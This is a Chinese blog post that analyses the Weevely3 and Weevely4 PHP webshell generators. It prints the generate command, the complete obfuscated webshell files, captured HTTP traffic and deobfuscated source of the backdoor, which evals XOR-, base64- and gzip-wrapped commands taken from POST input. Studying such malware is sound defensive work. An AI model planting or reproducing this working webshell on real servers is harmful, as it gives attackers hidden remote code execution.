Weevely代码分析

亲测php5和php8都无效,只有php7有效

ailx10

1949 次咨询

4.9

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

上一次做weevely实验可以追溯到2020年,当时还是weevely3.7,现在的是weevely4 生成php网页木马依然差不多......

php菜刀weevely的简单实验19 赞同 · 3 评论文章​编辑

生成webshell文件的方式还是一样的

复制代码
weevely generate ailx10 webshell.php

格式如下:

复制代码
<?php
$k='=|=|(=|=|$j<$c&&$i<$l);$j++,$i++=|){$o.==|$=|=|=|t{$i}^$k{$j};}}return $o=|;}if =|=|(@preg_matc=|h=';
$o=str_replace('h','','chreahtehh_fhunhction');
$M='_end_clea=|=|n=|();$r=@=|bas=|e64_e=|ncode(@x(@=|gz=|compress($o),$=|k));print("$=|p=|$kh$r$kf");}';
$B=';func=|tion x($t,=|$k){$c=s=|t=|rlen($k);$l=s=|trlen(=|$t=|);$o=|=|="";for($i=|=0;$i<$l;){for=|($j=0;';
$g='$k="8=|3b70504";=|$kh="e=|0d8742=|dd5b6"=|;$k=|f="6e696=|2=|eb8a35";$p="=|6Dn1Vri=|K6eU=|iVd=|=|CB"';
$E='val(@gzuncom=|press=|(@x(@b=|=|ase64_decod=|e($m=|[1]),$k)=|=|));$o=@ob_get_=|con=|tents(=|=|);@ob';
$R='|("/$kh(.+)$=|kf/",@f=|=|ile_get_co=|ntents("=|=|php://in=|=|put"),$m)==1) {@o=|b_s=|tart();@=|e=|';
$v=str_replace('=|','',$g.$B.$k.$R.$E.$M);
$X=$o('',$v);$X();
?>

对比一下weevely3

复制代码
<?php
$z='"a~;funca~tion x($a~ta~,$k){$c=a~strlen($k)a~;$la~=a~strlen(a~$t);$oa~a~="a~";for($i=0;$i<$l;){f';
$S='reg_matca~a~h("/$kh(a~.+a~)$kf/",@fa~ile_geta~_a~contents("a~pa~ha~p://inpua~t"),$m)==1){@ob_sa~';
$c=str_replace('K','','crKKeateK_fKunKKction');
$G='tart();@ea~val(@ga~za~uncompra~essa~(@x(a~@base6a~4_decoda~e($m[1]),$k)))a~a~;$a~a~o=@ob_ga~et_contents();a~@ob';
$X='_end_cleaa~n(a~);$r=@baa~se64_ena~ca~oa~de(@x(@gzcomprea~ss($o),$ka~));pa~a~rint(a~"$p$kh$r$kf");}';
$D='or($j=a~a~a~0;($j<$c&&$i<$l);$a~j++,$a~i++){$o.a~=$t{a~$i}^$a~a~k{$j};a~}}retua~rna~ $o;}if(@p';
$Y='$ka~="83ba~70504a~";$kh="ea~0a~d8742a~dd5b6";$kf="6a~e6962a~eb8a3a~5";$p="B1LWa~FZL8ia~ThxpsWa~b';
$g=str_replace('a~','',$Y.$z.$D.$S.$G.$X);
$e=$c('',$g);$e();
?>

wireshark 抓包分析,第一个http请求分析和应答分析

weevely3第一个http请求

复制代码
 S3GQ#]g2:gmrV; e0d8742dd5b6QK8pev795wQMglKA5IE2NC/IYQ46e6962eb8a35g`,nMD4E DE0 {g(

weevely3第一个http应答

复制代码
8mxY44h2cwP5HCvee0d8742dd5b6QK9RA4EFhzA4MHs2Pg==6e6962eb8a35

再来看一下weevely4

weevely4第一个http请求

复制代码
kV8v2J'|Ww2q59QKe0d8742dd5b6QK8pev795wQMBtcD4IE2NC/sYQc6e6962eb8a351) _TH<qL"g#GObZ

weevely4第一个http应答

复制代码
Crq5Lait6en1SFoOe0d8742dd5b6QK9RAwWABDQ4MG02NQ==6e6962eb8a35\n

weevely3代码分析,都是匿名函数

weevely3代码分析

复制代码
$k="83b70504";$kh="e0d8742dd5b6";
$kf="6e6962eb8a35";$p="8mxY44h2cwP5HCve";
function x($t,$k)
{$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i<$l;)
{for($j=0;($j<$c&&$i<$l);$j++,$i++)
{$o.=$t{$i}^$k{$j};}}return $o;}
if(@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1)
{@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");}

weevely4代码分析,都是匿名函数

weevely4代码分析

复制代码
$k="83b70504";$kh="e0d8742dd5b6";
$kf="6e6962eb8a35";$p="Crq5Lait6en1SFoO";
function x($t,$k)
{$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i<$l;)
{for($j=0;($j<$c&&$i<$l);$j++,$i++)
{$o.=$t{$i}^$k{$j};}}return $o;}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) 
{@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");}

发布于 2022-10-13 10:33

相关推荐
技术不好的崎鸣同学44 分钟前
[BJDCTF2020]The mystery of ip 思路及解法
网络·安全·web安全
Bruce_Liuxiaowei2 小时前
2026年7月第1周网络安全形势周报
人工智能·安全·web安全·ai·智能体
菩提小狗4 小时前
每日安全情报报告 · 2026-07-01
网络安全·漏洞·cve·安全情报·每日安全
忡黑梨4 小时前
安装 Claude Code(使用 DeepSeek API)
网络·网络安全
treesforest17 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安17 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
上海云盾第一敬业销售17 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手17 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub17 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61117 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全